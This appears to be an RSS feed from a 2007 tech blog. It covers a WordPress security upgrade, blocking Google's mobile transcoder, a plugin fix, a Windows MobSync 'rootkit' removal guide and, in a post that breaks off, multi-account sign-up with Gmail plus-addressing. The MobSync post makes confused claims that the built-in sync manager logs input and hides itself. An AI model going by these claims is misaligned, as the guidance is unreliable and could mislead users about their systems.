<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; 2007 &#187; December</title>
	<atom:link href="http://42.kaizeku.com/2007/12/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Upgrade Wordpress 2.3.2</title>
		<link>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/</link>
		<comments>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/#comments</comments>
		<pubDate>Sun, 30 Dec 2007 11:36:40 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[2.3.2]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/upgrade-wordpress-232/</guid>
		<description><![CDATA[WordPress developer had to release this 'securities' fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade than sorry. ]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I just upgrade today, <a href="http://wordpress.org/download/">WordPress 2.3.2</a>, fixed a <a href="http://trac.wordpress.org/ticket/5487">nasty vulnerability</a>. I haven&#8217;t did any test yet but according to &#8220;<a href="http://blog.kakkoi.net/wordpress/upgrade-wordpress-232/#black-domainer">blackhat domainer</a>&#8221; you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).<br />
<span id="more-119"></span><br />
WordPress developer had to release this &#8217;securities&#8217; fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade. </p>
<p>Peter Westwood&#8217;s sum up all wordpress 2.3.2 recent <a href="http://westi.wordpress.com/2007/12/30/wordpress-232-in-detail/">change and update in details</a>. Read it first before you decide to upgrade.</p>
<h2>External Links</h2>
<ul>
<li><a id="black-domainer" class="url" href="http://www.blackhatdomainer.com/how-to-know-today-what-shoemoney-is-going-to-post-tomorrow/" rel="external">How to know today what ShoeMoney is going to post tomorrow</a></li>
<li><a href="http://wordpress.org/development/2007/12/wordpress-232/">Wordpress 2.3.2 Announcements (dev blog)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to block Google Wireless Transcoder</title>
		<link>http://42.kaizeku.com/tips/how-to-block-google-wireless-transcoder-gwt-googlebot-mobile/</link>
		<comments>http://42.kaizeku.com/tips/how-to-block-google-wireless-transcoder-gwt-googlebot-mobile/#comments</comments>
		<pubDate>Sat, 29 Dec 2007 07:11:19 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[GWT]]></category>

		<category><![CDATA[Google Proxy]]></category>

		<category><![CDATA[Google-mobile]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[Google]]></category>

		<category><![CDATA[Google Wireless Transcoder]]></category>

		<category><![CDATA[googlebot-mobile]]></category>

		<category><![CDATA[htaccess]]></category>

		<category><![CDATA[proxy]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/tips/how-to-block-google-wireless-transcoder-gwt-googlebot-mobile/</guid>
		<description><![CDATA[

When Google Wireless Transcoder (GWT, Googlebot-mobile) translate your website it strip all &#8220;scripts&#8221; and render it in mobile format (XHTML mobile 1.0)Google version of &#8220;Mobile format&#8221;. To test this services go to http://google.com/gwt/n. GWT services is actually made for mobile-user but you can still surf with normal browser.
So what the heck wrong with it
The answer [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/google_mobile.gif' alt='google_mobile.gif' width="70" height="75" class="fl" />When <strong class="fw-">Google Wireless Transcoder </strong>(GWT, Googlebot-mobile) translate your website it strip all &#8220;scripts&#8221; and render it in mobile format (XHTML mobile 1.0)<span class="td-l">Google version of &#8220;Mobile format&#8221;</span>. To test this services go to <a href="http://google.com/gwt/n" class="external icn-r exturl">http://google.com/gwt/n</a>. GWT services is actually made for mobile-user but you can still surf with normal browser.</p>
<h2>So what the heck wrong with it</h2>
<p>The answer is Yes &#038; No. This type of services is bad for webmaster that depend on ads income. Otherwise Normal Surfer would love this services as they wont need to view any ads and surf safely without &#8220;javascript embed&#8221; (from the originating website).<br />
<span id="more-113"></span></p>
<h2>How to Block Googlebot Mobile Crawler</h2>
<p>These are some server environment variables for <strong>Google Wireless Transcoder</strong> </p>
<dl id="GWT" class="profile">
<dt>USER_AGENT</dt>
<dd>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)</dd>
<dt>HTTP_VIA</dt>
<dd>1.1 proxy.google.com:80 (squid)</dd>
<dt>HTTP_X_FORWARDED_FOR</dt>
<dd>xxx.xx.xxx.xxx, unknown</dd>
<dt>REMOTE_ADDR</dt>
<dd>209.85.138.136</dd>
<dt>REMOTE_PORT</dt>
<dd>56931</dd>
</dl>
<h2>block via .htaccess</h2>
<p>with <a href="http://httpd.apache.org/docs/1.3/mod/mod_setenvif.html" rel="external">mod_setenvif</a></p>
<pre class="prebox">
&lt;IfModule mod_setenvif.c&gt;
SetEnvIfNoCase User-Agent &quot;^Google\ Wireless\ Transcoder*&quot; gwt_agent=1
SetEnvIfNoCase User-Agent &quot;^Googlebot-Mobile*&quot; gwt_agent=1
&lt;FilesMatch &quot;(.*)&quot;&gt;
Order Allow,Deny
Allow from all
Deny from env=gwt_agent
&lt;/FilesMatch&gt;
&lt;/IfModule&gt;
</pre>
<p>or with <a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html" rel="external">mod_rewrite</a></p>
<pre class="prebox">
&lt;IfModule mod_rewrite.c&gt;
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Google\ Wireless\ Transcoder [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot-Mobile
RewriteRule ^.* - [F,L]
&lt;/IfModule&gt;
</pre>
<h2>Robots Exclusion Standards</h2>
<pre class="prebox">
User-agent: Googlebot-Mobile
Disallow: /
</pre>
<h3>Google Webmaster Analyze robots.txt</h3>
<p>After you add the above robot.txt code login to your <a href="http://www.google.com/webmasters/tools/" class="google icn-l1">Google Webmaster Central</a>. </p>
<ol class="cb">
<li>Select Tools &gt; Analyze robots.txt </li>
<li>Select <tt class="di">Google Mobile : Crawls page for our mobile index</tt> on &#8220;user-agents dropdown list&#8221;.</li>
</ol>
<p><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/google-webmaster-tools-analyze-robotstxt.png' alt='google-webmaster-tools-analyze-robotstxt.png' /></p>
<h2 class="cb">Embed HTML Meta Link header</h2>
<pre class="smallbox">
&lt;link rel=&quot;alternate&quot; media=&quot;handheld&quot; href=&quot;http://changethis-url-for-mobile-user&quot; /&gt;
</pre>
<h2>Google Support</h2>
<p>If you want to prevent Google Mobile services from transcoding your page its recommended to request for removal via <a href="http://www.google.com/support/mobile/bin/request.py?contact_type=googlebot">Google Mobile Support</a> form. </p>
<h2>Soap</h2>
<p>If google-mobile can restrict this services for mobile only view or maybe implement something like &#8220;<a href="http://www.duggtrends.com">duggmirror</a>&#8221; for normal browsing, it would be welcome. </p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/tips/how-to-block-google-wireless-transcoder-gwt-googlebot-mobile/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Fix Gravatars2 PHP5 HTTPRequest Fatal Error</title>
		<link>http://42.kaizeku.com/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/</link>
		<comments>http://42.kaizeku.com/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/#comments</comments>
		<pubDate>Wed, 26 Dec 2007 19:41:00 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Plugins]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[gravatars]]></category>

		<category><![CDATA[gravatars2]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[plugins]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/</guid>
		<description><![CDATA[I used <a href="http://zenpax.com/gravatars2/" rel="nofollow">gravatars2</a> plugins to support my <a href="http://theme.istalker.net">new sexy theme</a>. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I <a href="http://zenpax.com/gravatars2/discussion/#comment-2951" rel="nofollow">did asked</a> them to updated it but till today's this bug still exists with Gravatars2 plugins.

<pre class="prebox" style="height:50px;width:90%">
Plugin could not be activated because it triggered a <strong>fatal error</strong>.
Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284
</pre>

This "fatal error" or conflict happen if you had PHP 5 ( 5.0 > 5.1 above) with  <a href="http://usphp.com/manual/en/function.httprequest-send.php">HTTPRequest</a> Modules Installed. ]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I used <a href="http://zenpax.com/gravatars2/">gravatars2</a> plugins to support my <a href="http://theme.istalker.net">new sexy theme</a>. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I <a rel="nofollow" href="http://zenpax.com/gravatars2/discussion/#comment-2951">did asked</a> them to updated it but till today&#8217;s this bug still exists with Gravatars2 plugins.</p>
<p>This <em>&#8220;fatal error&#8221;</em> or conflict happen if you had PHP 5 ( 5.0 &gt; 5.1 above) with <a href="http://usphp.com/manual/en/ref.http.php">HTTPRequest</a> Modules Installed.<br />
<span id="more-111"></span></p>
<pre class="prebox" style="height:50px;width:550px;overflow:auto">
Plugin could not be activated because it triggered a <strong>fatal error</strong>.
Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284
</pre>
<h2 class="sep">HTTPRequest Classname Conflict</h2>
<p>It&#8217;s not that hard to fix this &#8220;Naming Conflicts&#8221;. All you need is &#8220;Search and Replace&#8221; <strong>HTTPRequest</strong> class name to different name (ie: _HTTPRequest, HTTP__Request) so it wont conflict with PHP HTTPRequest Standard Class. If you don&#8217;t know how to do this. Check the below lists. It wont take long.</p>
<ol class="nfo">
<li>Open <tt>wp-content/plugins/gravatars2.php</tt> or <tt>http://www.my-domain-name.com/wp-admin/plugin-editor.php?file=gravatars2.php</tt></li>
<li>Find on line <span class="b">284</span>
<pre>class HTTPRequest</pre>
<p>Replace with </p>
<pre>class _HTTPRequest</pre>
</li>
<li>Next find on line <span class="b">323</span>
<pre>function HTTPRequest($url, $timeout)</pre>
<p>Replace with </p>
<pre>function _HTTPRequest($url, $timeout)</pre>
</li>
<li>Final step find on line <span class="b">408</span>
<pre>$hr = new HTTPRequest($url, $timeout);</pre>
<p>Replace with </p>
<pre>$hr = new _HTTPRequest($url, $timeout);</pre>
</li>
<li>Save or upload back to wp-content/plugins/</li>
</ol>
<p>Thats all</p>
<h2 class="sep">Gravatars2</h2>
<p>For the record - &#8220;Gravatar2 developer doesn&#8217;t give support without donation&#8221;.</p>
<p><em>Excerpt from <a href="http://zenpax.com/gravatars2/discussion/#comment-1" rel="nofollow">Kip Bond at zenpax.com</a></em></p>
<blockquote cite="http://zenpax.com/gravatars2/discussion/#comment-1"><p>I am no longer giving support for this plugin without a donation — it’s becoming repetitive and not very rewarding. You can email me (kip @ this website’s hostname (zenpax.com)) with your question, and I can tell you what minimum donation amount is sufficient per the difficulty of the question. Note that this donation in no way obligates me to any contractual duties. It’s mostly a way to make sure that people have exhausted their own efforts at resolving their own problems before asking for my support. ~<a href="http://zenpax.com/">kip Bond</a></p></blockquote>
<p>I hope these would explain some curiosity.</p>
<p>tips to php developer: used <tt>class_exists</tt> before declaring any user define class.</p>
<h2 class="sep">Related Links</h2>
<ul>
<li><a href="http://zenpax.com/gravatars2/discussion/" rel="nofollow">Gravatars2 Discussion &#038; Support page</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How To Disabled and Removed Microsoft Windows MobSync - Trojan RootKit</title>
		<link>http://42.kaizeku.com/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/#comments</comments>
		<pubDate>Mon, 24 Dec 2007 20:07:00 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Malware]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[mobile]]></category>

		<category><![CDATA[mobsync]]></category>

		<category><![CDATA[rootkit]]></category>

		<category><![CDATA[Synchronization Manager]]></category>

		<category><![CDATA[Trojan]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/</guid>
		<description><![CDATA[<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/mobsyncexe.png' alt='mobsync.exe'  class="fl"/><strong>MobSync</strong> is a <strong>Microsoft Mobile Synchronization Manager </strong>available in Win 2000 &#38; Windows XP</p>
<p class="cl">Excerpt from <a href="http://support.microsoft.com/kb/314512">Microsoft KB 314512</a> Articles (2002)</p>
<blockquote>
The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.
</blockquote>

<p>Technically MobSync is  part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device  programs takes to start up. </p>

<h2>MobSync Issue</h2>
<p>MobSync is registered to run on logon but the process is hidden on others 'Scans Tools' like Autoruns.exe &#038; Process.exe (SysInternal).</p>
QuickFact:
<ul>
	<li> MobSync.exe can record inputs.</li>
	<li> Its hide itself from monitor applications.</li> 
</ul>
Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit. [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/mobsyncexe.png' alt='mobsync.exe' class="fl"/><strong>MobSync</strong> is a <strong>Microsoft Mobile Synchronization Manager </strong>available in Win 2000 &amp; Windows XP</p>
<p class="cl">Excerpt from <a href="http://support.microsoft.com/kb/314512">Microsoft KB 314512</a> Articles (2002)</p>
<blockquote><p>
The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.
</p></blockquote>
<p>Technically MobSync is part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device programs takes to start up. </p>
<h2>MobSync Issue</h2>
<p>MobSync is registered to run on logon but the process is hidden on others &#8216;Scans Tools&#8217; like Autoruns.exe &#038; Process.exe (SysInternal).</p>
<p>QuickFact:</p>
<ul>
<li> MobSync.exe can record inputs.</li>
<li> Its hide itself from monitor applications.</li>
</ul>
<p>Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit.<br />
<span id="more-101"></span></p>
<h2 class="sep">Should I disabled Mobsync?</h2>
<p>If you used windows for surfing and office works you probably wont need this programs <span style="text-decoration:line-through">(crapware)</span> most modern mobile device has a build in Synchronization Manager and doesnt relies on microsoft mobsync (dependencies issue). Its recommended to disabled this programs as it can hide itself from being monitored and doesnt showup on running process lists. </p>
<h2 class="sep">Step by step guide to disabled MobSync from your windows.</h2>
<ol>
<li>
<h3>Disabled System Restore</h3>
<p>You will need to disabled <a href="http://www.microsoft.com/technet/community/newsgroups/faqsrwxp.mspx"> Windows System Restore</a> (Temporary).</li>
<li>
<h3>View hidden system files</h3>
<p>Suspicious files is known to hide itself as Windows System files. The following settings will set all hidden files viewable so we could removed it.</p>
<ul>
<li>Click on Windows Start &rarr; Control Panel &rarr; Folder Options &rarr; View Tab </li>
<li>Turn on the option to show hidden files</li>
</ul>
</li>
<li>
<h3>Clean Temporary Files and Windows Prefetch Files</h3>
<p>This wont harm your system. Removes all files inside the following directory. <span class="b">Remove the contents only not the folders</span>.</p>
<ul>
<li>C:\temp</li>
<li>C:\windows\temp</li>
<li>C:\Documents and Settings\&lt;username&gt;\Local Settings\Temp</li>
<li>C:\windows\prefetch</li>
</ul>
</li>
<li>
<h3>Boot in SafeMode</h3>
<p>Restart your PC in safe mode. Refer <a href="http://support.microsoft.com/kb/315222">KB 31522</a> on How To Boot in Safe Mode.</li>
<li>
<h3>Disabled MobSync Process</h3>
<ol class="nfo">
<li>Click on start &rarr; Run &rarr; <strong>mobsync</strong></li>
<li> Next, Click on <span style="font-weight:700">Setup</span> buttons</li>
<li> On &#8220;Synchronizations Settings&#8221; Windows <span style="font-weight:700">Logon/Logoff</span> tab un-check all the following options:</p>
<p><tt>Automatically Synchronize the following items:</tt></p>
<ul>
<li>When I log on to my computer</li>
<li>When I log off to my computer</li>
</ul>
</li>
<li>While still in &#8220;Synchronizations Settings&#8221; Windows select the next tab label <span style="font-weight:700">&#8220;on Idle&#8221;</span> un-check the following items:
<ul>
<li>Synchronize the selected items while my computer is idle</li>
</ul>
</li>
</ol>
</li>
<li>
<h3>Removed from system registry</h3>
<p>If you arent familiar with registry you may skip this part. Most normal startup programs can be found at the following registry path.</p>
<ul>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\Run
<li>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce</li>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices</li>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</li>
<li>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</li>
<li>HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</li>
</ul>
<p>In Windows XP all loaded &#8220;startup programs&#8221; (start menu/startup items) can be found at <tt>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg</tt></p>
<p><strong>Mobsync registry</strong> <tt>HKLM\Software\Microsoft\Windows\CurrentVersion\syncmgr</tt>
</li>
</ol>
<h2 class="sep">Note on using Rootkit Scanner.</h2>
<ul>
<li><a href="http://aumha.org">James A. Eshelman</a> <a href="http://aumha.org/downloads/hijackthis.exe"> HijackThis</a></li>
<li><a href="http://forum.sysinternals.com/">SysInternal</a> <a href="http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx">RootkitRevealer</a></li>
<li><a href="http://www.f-secure.com">F-secure</a> <a href="http://www.f-secure.com/blacklight/">Blacklight</a></li>
</ul>
<p>Most advance Rootkit has a self mechanism to shutdown the system if any of this programs is identify in the memory. If you had this programs installed its advice to rename the programs first. </p>
<ul>
<li> RootKitRevealer.exe &rarr; RKV.exe</li>
<li>HijackThis &rarr; hjct.exe</li>
</ul>
<h3>How to validate if the running programs is Tempered</h3>
<p>Get <a href="http://www.wmsoftware.com/download.aspx?product=chktrust">Certificate Verification Tool</a> ( WM Software Corp) and verify the programs signature or you could also run Microsoft sigverif.exe (c:\windows\SIGVERIF.TXT) to verify digital signature. </p>
<p>Caveat: Most Rookit is &#8220;padded/mugged&#8221; with unix controls character so its not readable by Windows (ANSI).</p>
<h3>Setupapi.log entries</h3>
<p>Setupapi.log can be found inside <tt>c:\windows\setupapi.log</tt> You need to enabled logging in verbose mode to get proper setup log.<br />
<tt>HKLM\Software\Microsoft\Windows\CurrentVersion\SetupLogLevel</tt></p>
<p>Insert DWORD value 0000FFFF to enabled verbose mode logging</p>
<p>Insert DWORD value 0 to disabled it</p>
<p>Tempered MobSync.exe &#038; similar windows networks files.</p>
<pre class="prebox">
An unsigned or incorrectly signed file
(c:\windows\msdownld.tmp\as03b1e1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll to
C:\WINDOWS\SYSTEM\msidle.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe to
C:\WINDOWS\SYSTEM\mobsync.exe.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll to
C:\WINDOWS\SYSTEM\mobsync.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll to
C:\WINDOWS\SYSTEM\sens.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll to
C:\WINDOWS\SYSTEM\sensapi.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll to
C:\WINDOWS\SYSTEM\senscfg.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll to
C:\WINDOWS\SYSTEM\es.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll to
C:\WINDOWS\SYSTEM\esshared.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll to
C:\WINDOWS\SYSTEM\estier2.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd to
C:\WINDOWS\SYSTEM\sage.vxd.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll to
C:\WINDOWS\SYSTEM\esenu.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf to
C:\WINDOWS\INF\mobilepk.inf.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp to
C:\WINDOWS\help\chnscsvr.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat to
C:\WINDOWS\SYSTEM\sfp\ie\mobilepk.cat.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp to
C:\WINDOWS\help\mobsync.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp) was installed. Error
0xe000022f: The third-party INF does not contain digital signature information.
</pre>
<h2>Summary</h2>
<p>What really bother me, is Microsoft Windows Setup API. Any downloaded Microsoft system files has embed sign-in digital signature. Windows installation will validate all setup file and logs out error if the file has a bad signature (third party signature or file being tempered). The flaw is within the Windows Setup API itself. It doesn&#8217;t protect you from installing bad programs. </p>
<p>You should thanks Microsoft developer for making good Installation Programs and reporting tools. it remind you of error but installed it nonetheless.</p>
<h2 class="sep">External Links</h2>
<ul class="xoxo nfo">
<li><a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/syncmgr/syncmgr/about_system_event_notification_service.asp">MSDN System Event Notification Service (SENS)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Register Multiple Accounts (MU) on Websites With Single Email Addresses</title>
		<link>http://42.kaizeku.com/tips/how-to-register-multiple-accounts-on-websites-with-single-email-addresses/</link>
		<comments>http://42.kaizeku.com/tips/how-to-register-multiple-accounts-on-websites-with-single-email-addresses/#comments</comments>
		<pubDate>Sun, 23 Dec 2007 22:58:24 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Gmail]]></category>

		<category><![CDATA[Gravatar]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[Automattic]]></category>

		<category><![CDATA[gravatar]]></category>

		<category><![CDATA[RFC2282]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/tips/how-to-register-multiple-accounts-on-websites-with-single-email-addresses/</guid>
		<description><![CDATA[<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/gravatar-logo.gif' class="fl" alt='Gravatar Logo' />You can used this technique to register on sites and forum. To name a few &#8594; digg, myspace, newsvine, 9rules, blogger  &#038; msn etc. </p>
<p>Gravatar sign-up process took less than 5 minute to complete and they don't burden you with filling form chores (i.e: address, newsletter subscriptions, marketing questionnaire). So we pick <a href="http://site.gravatar.com" rel="exernal" rev="vote-for">Gravatar</a>  Web services for this guide.</p>

<h2 class="cb" style="border-bottom:1px solid #ccc;padding:3px">Requirements</h2>
You must have the following email.  
<ol class="xoxo r" style="list-style-type:decimal">
<li><a href="http://gmail.google.com/">Gmail</a> or Google Aps Gmail</li>
</ol>
<h2 class="cb" style="border-bottom:1px solid #ccc;padding:3px;margin-top:36px">Gmail Plus-Addressing Features</h2>
<p><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif" alt="Gmail Email services Logo" width="130" height="54" class="fr" longdesc="http://www.shareapic.net/preview2/004669852.gif" />In brief, Gmail services has undocumented <strong>plus-addressing features</strong> (+) since early 2004. The plus-addressing features is mostly used for writing self notes, email filtering and mapping (google maps).</p>
<cite class="db" style="margin:10px;padding:10px;">"Gmail never announce this features (beta forever) as there is no official documentation at Gmail Help Center." — Anon </cite> [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/gravatar-logo.gif' class="fl" alt='Gravatar Logo' />You can used this technique to register on sites and forum. To name a few &rarr; digg, myspace, newsvine, 9rules, blogger &#038; msn etc. </p>
<p>Gravatar sign-up process took less than 5 minute to complete and they don&#8217;t burden you with filling form chores (i.e: address, newsletter subscriptions, marketing questionnaire). So we pick <a href="http://site.gravatar.com" rel="external" rev="vote-for">Gravatar</a> Web services for this guide.</p>
<h2 class="cb" style="border-bottom:1px solid #ccc;padding:3px">Requirements</h2>
<p>You must have the following email. </p>
<ol class="xoxo r">
<li><a href="http://gmail.google.com/">Gmail</a> or Google Aps Gmail</li>
</ol>
<h2 class="cb" style="border-bottom:1px solid #ccc;padding:3px;margin-top:36px">Gmail Plus-Addressing Features</h2>
